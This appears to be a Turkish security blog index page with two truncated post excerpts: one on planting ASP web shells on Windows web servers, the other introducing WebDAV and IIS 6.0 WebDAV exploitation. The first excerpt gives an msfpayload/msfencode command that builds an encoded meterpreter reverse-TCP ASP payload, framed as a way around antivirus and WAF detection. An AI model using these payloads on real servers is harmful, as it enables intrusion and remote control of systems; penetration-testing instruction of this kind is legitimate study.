Windows Web sunuculara yapılan ataklar sonrası, saldırgan sistemde bir arkakapı oluşturmak, sistemde komut çalıştırmak ve yetki yükseltmek için çeşitli web tabanlı scriptler kullanırlar.Bilinen en meşhurları arasında cyberspy5.asp , zehir4.asp, efso.asp ve  .net ile yazılmış FSO (file system object) fonksiyonlarını kullanan yazılımlar bulunuyor. Bu tür yazılımların ortak özelliği, FSO kullanarak dosya dizin işlemlerini gerçekleştirmek, sistemde komut çalıştırmak, port açabilmek ve uzak bir sisteme bağlantı gerçekleştirebilmektir.

Bu kadar bilinir olmaları antivirus, kaçak giriş tespit sistemleri  ve wep application firewall’lar tarafından kolayca engellenmelerine olanak sağlıyor.

Metasploit Exploit Framework ile, msfpayload ve msfencode yardımcı araçları kullanılarak meterpreter payloadını asp olarak encode edip  bind shell veya reverse shell bağlantısı kurulabilir.

Bu örnekte ters bağlantı (reverse connetion) kullanılmıştır.

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t asp -o ajan443.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

Read more

WEBDAV Servisi Nedir / Nasıl Çalışır ?

WEBDAV (Web-based Distributed Authoring and Versioning ) servisi, web üzerinden dosya/dizin paylaşmayı sağlar. HTTP 1.1 protokolü ile çalışır. Kritik bir öneme sahiptir, sık çıkan güvenlik zaafiyetleri ve yanlış yapılandırma ile ciddi güvenlik riskleri oluşturmaktadır.Bu yazıda webdav servislerinin tespit edilmesi ve IIS 6.0 webdav zayıflığını sömürmekten bahsedilmiştir.

IIS Webdav Yapılandırma Read more